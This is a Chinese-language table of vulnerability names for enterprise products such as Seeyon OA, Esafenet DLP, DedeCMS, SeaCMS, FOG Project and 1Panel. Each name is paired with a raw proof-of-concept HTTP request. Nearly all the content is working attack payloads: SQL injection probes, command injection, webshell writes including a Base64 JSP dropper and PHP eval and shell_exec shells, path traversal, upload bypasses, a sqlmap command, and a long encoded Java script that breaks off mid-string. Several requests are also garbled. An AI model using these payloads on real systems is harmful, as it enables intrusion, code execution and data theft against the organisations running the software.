| 漏洞名称 | 漏洞POC |
| 浪潮云财务系统存在命令执行 | POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: 16396 SOAPAction: “http://tempuri.org/GetChildFormAndEntityList” cmd: whoami <?xml version=”1.0″ encoding=”utf-8″?> |
| 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞 | POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host: ip:8443 Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536 Cache-Control: max-age=0 Sec-Ch-Ua: “Chromium”;v=”124″, “Google Chrome”;v=”124″, “Not-A.Brand”;v=”99″ Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: “Windows” Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded command=delNotice¬iceId=123′;if (select IS_SRVROLEMEMBER(‘sysadmin’))=1 WAITFOR DELAY ‘0:0:5’– |
| 通天星 CMSV6 车载定位监控平台 disable SQL注入漏洞 | GET /edu security officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOli%29 HTTP/1.1Host:{{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/75.0.3770.100 Safari/537.36 |
| 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞 | POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917:JSESSIONID=06DCD58EDC037F785605A29CD7425C66Cache-Control: max-age=0Sec-Ch-Ua: “Chromium”;v=”124″, “Google Chrome”;v=”124″, “Not-A.Brand”;v=”99″Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform:”Windows’Upgrade-Insecure-Requests:1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;g=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site:cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer:Accept-Encoding: gzip, deflateAccept-Language:zh-CN,zh;g=0.9Priority: u=0,iConnection: closeContent-Type:application/x-www-form-urlencodedContent-Length:98 command=updateNetSec&state=123′;if (select IS SRVROLEMEMBER(‘sysadmin’)=1 WAITFOR DELAY ‘0:0:5’– command=updateNetSec&state=123′;if (select IS SRVROLEMEMBER(‘sysadmin’)=1 WAITFOR DELAY ‘0:0:5’– |
| 致远在野 nday constDef接囗存在代码执行漏洞 | GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22PCUKaWYocmVxdWVzdC5nZXRQYXJhbWV0ZXlolmYiKSE9bnVsbCkobmV3lGphdmEuaW8uRmlsZU91dHB1dFN0cmVhbShhcHBsaWNhdGlvbi5nZXRSZWFSUGF0aCgiXFwiKStyZXF1ZXN0LmdldFBhcmFtZXRlcigiZilpKSkud3JpdGUocmVxdWVzdC5nZXRQYXJhbWV0ZXlolnQiKs5n ZXRCeXRIcygpKTSKJT4=%22));%22&constDescription=123&constType=4 HTTP/1.1 Host: {{Hostname}} |
| 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞 | GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HT TP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0 8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateconnection:closeUpgrade-Insecure-Requests: 1 |
| 福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞 | POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Content-Type: application/x-www-form-urlencodeddep leveI=1’) UNION ALL SELECT NULL,CONCAT(0x7e,user0,0x7e),NULL,NULL,NULL– – |
| DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 | POST /dede/article_template_rand.php HTTP/1.1 Host: 127.0.0.11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://127.0.0.11 Connection: close Referer: http://127.0.0.11/dede/article_template_rand.php Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; _csrf_name_236f0c58=8f0d4c50bfce77f693ce4b8d93af8be7; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=23bfa72eb66439a6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720185221; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d2b9bcefe628ee47; ENV_GOBACK_URL=%2Fdede%2Fsys_admin_user.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=4 dopost=save&token=7fa44bfa91d7f797b4c983c76f7c9f9e&templates=%3C%3Fphp%0D%0A%0D%0A%2F%2F%E8%BF%99%E4%B8%AA%E5%80%BC%E4%B8%BA+0+%E8%A1%A8%E7%A4%BA%E5%85%B3%E9%97%AD%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C+%E4%B8%BA+1+%E8%A1%A8%E7%A4%BA%E5%BC%80%E5%90%AF%0D%0A%24cfg_tamplate_rand+%3D+0%3B%0D%0A%0D%0A%2F%2F%E6%A8%A1%E6%9D%BF%E6%95%B0%E7%BB%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%A2%9E%E5%8A%A0%EF%BC%8C%E6%8C%89%E8%BF%99%E4%B8%AA%E6%A0%BC%E5%BC%8F%E5%A2%9E%E5%8A%A0%E6%88%96%E4%BF%AE%E6%94%B9%E5%8D%B3%E5%8F%AF%28%E5%BF%85%E9%A1%BB%E7%A1%AE%E4%BF%9D%E8%BF%99%E4%BA%9B%E6%A8%A1%E6%9D%BF%E6%98%AF%E5%AD%98%E5%9C%A8%E7%9A%84%29%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%95%B0%E9%87%8F%E5%BF%85%E9%A1%BB%E4%B8%BA2%E4%B8%AA%E6%88%96%E4%BB%A5%E4%B8%8A%E3%80%82%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article1.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article2.htm%27%3B%0D%0A%24a+%3D+%27_POST%27%3B%0D%0A%24%24a%5B1%5D%28%24%24a%5B0%5D%29%3B%0D%0A%3F%3E%0D%0A&imageField1.x=6&imageField1.y=9 |
| DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞 | GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20`whoami`}} HTTP/1.1 Host: 127.0.0.11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720327720; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c5e6c12f26661f56; _csrf_name_236f0c58=6d608f0ee0d0e0b59410565dfeec6b2b; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=bc5881b7b91f1bd9 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=1 |
| 海洋CMS后台admin_smtp.php存在远程代码执行漏洞 | POST /at1fcg/admin_smtp.php?action=set HTTP/1.1 Host: 127.0.0.12 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 192 Origin: http://127.0.0.12 Connection: close Referer: http://127.0.0.12/at1fcg/admin_smtp.php Cookie: PHPSESSID=rcejd2jps1jcrv8gdoumqmf71k Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=4 smtpserver=${eval($_POST[1])}&smtpserverport=&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw= |
| fogproject系统接口export.php存在远程命令执行漏洞(C | POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1 Host: 192.168.15.5 Content-Length: 21 User-Agent: ToxicPotato Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fogguiuser=fog&nojson=2 |
| Netgear-WN604接口downloadFile.php信息泄露漏洞( | GET /downloadFile.php?file=config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept-Encoding: gzip, deflate Connection: close |
| 泛微E-office-10接口leave_record.php存在SQL注入漏洞 | GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 |
| H3C Workspace 云桌面 远程命令执行漏洞 | /webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined |
| 润乾报表前台任意文件上传漏洞(3个) | POST /InputServlet?action=12 HTTP/1.1 Host: 127.0.0.1:8080 Content-Type: multipart/form-data; boundary=————————–170005680039721412137562 Accept-Encoding: gzip, deflate, br Content-Length: 2401 —————————-170005680039721412137562 1024 11111 POST /InputServlet?action=13 HTTP/1.1 file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1 ——WebKitFormBoundaryAT7qVwFychEm0Dt7 <% out.println(“123”); %> ../../../ 1 |
| 天玥网络安全审计系统 SQL 注入漏洞 | POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Connection: close checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))– BAUh |
| 致远 OA fileUpload.do 前台文件上传绕过漏洞 | POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUploadHTTP/1.1 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30) Content-Length: 754 –00content0boundary00 Content-Disposition: form-data; name=”type” –00content0boundary00 Content-Disposition: form-data; name=”extensions” png –00content0boundary00 Content-Disposition: form-data; name=”applicationCategory” –00content0boundary00 Content-Disposition: form-data; name=”destDirectory” –00content0boundary00 Content-Disposition: form-data; name=”destFilename” –00content0boundary00 Content-Disposition: form-data; name=”maxSize” –00content0boundary00 Content-Disposition: form-data; name=”isEncrypt” false –00content0boundary00 Content-Disposition: form-data; name=”file1″; filename=”1.png” Content-Type: Content-Type: application/pdf <% out.println(“hello”);%> –00content0boundary00 POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 |
| F5 BIG-IP 远程代码执行漏洞 | https://github.com/adysec/nuclei_poc/blob/ce5a47e163f5440c84dbfc0adb073ab35f562154/poc/cve/CVE-2023-46747.yaml |
| 用友 U8 cloud MonitorServlet 反序列化漏洞 | POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 恶意序列化数据 |
| 万户 OA SQL 注入漏洞 | sqlmap -u “http://xxx.com/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1” –level 3 -dbs |
| 锐捷 RG-NBS2026G-P 交换机WEB 管理ping.htm未授权访问漏洞 | /safety/ping.htm |
| 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞 | GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive |
| 北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置 | 未知 |
| 同鑫科技 EHR 系统全系列 SQL 注入漏洞 | 未知 |
| 金和 OA C6CreateGroup 接口注入漏洞 | 未知 |
| 1Panel面板最新前台RCE漏洞 | GET / HTTP/1.1 Host: 192.168.99.6 User-Agent: ua’, ‘blog.mo60.cn’, 5201314, ”, ”, 1, ‘2024-06-09 08:16:52’, 1817921010.847, ‘/AAAAAAA’, 52014, ‘2025-06-09′, ’16’, ”, ”, ‘Linux’, ‘edge’, ‘pc’, ”, ”);ATTACH DATABASE ‘/www/sites/index/index/mo60.cn.php’ AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (‘<?= md5(“blog.mo60.cn”); ?>’);# |
| 蓝凌EKP存在sys_ui_component远程命令执行漏洞 | POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host: Accept:application/json,text/javascript,*/*;q=0.01 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8 Connection:close Content-Type:multipart/form-data; boundary=—-WebKitFormBoundaryL7ILSpOdIhIIvL51 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36 X-Requested-With:XMLHttpRequest Content-Length: 395 ——WebKitFormBoundaryL7ILSpOdIhIIvL51 replaceExtend ../../../../resource/help/km/review/ ../../../ekp/sys/common POST /resource/help/km/review/dataxml.jsp HTTP/1.1 s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u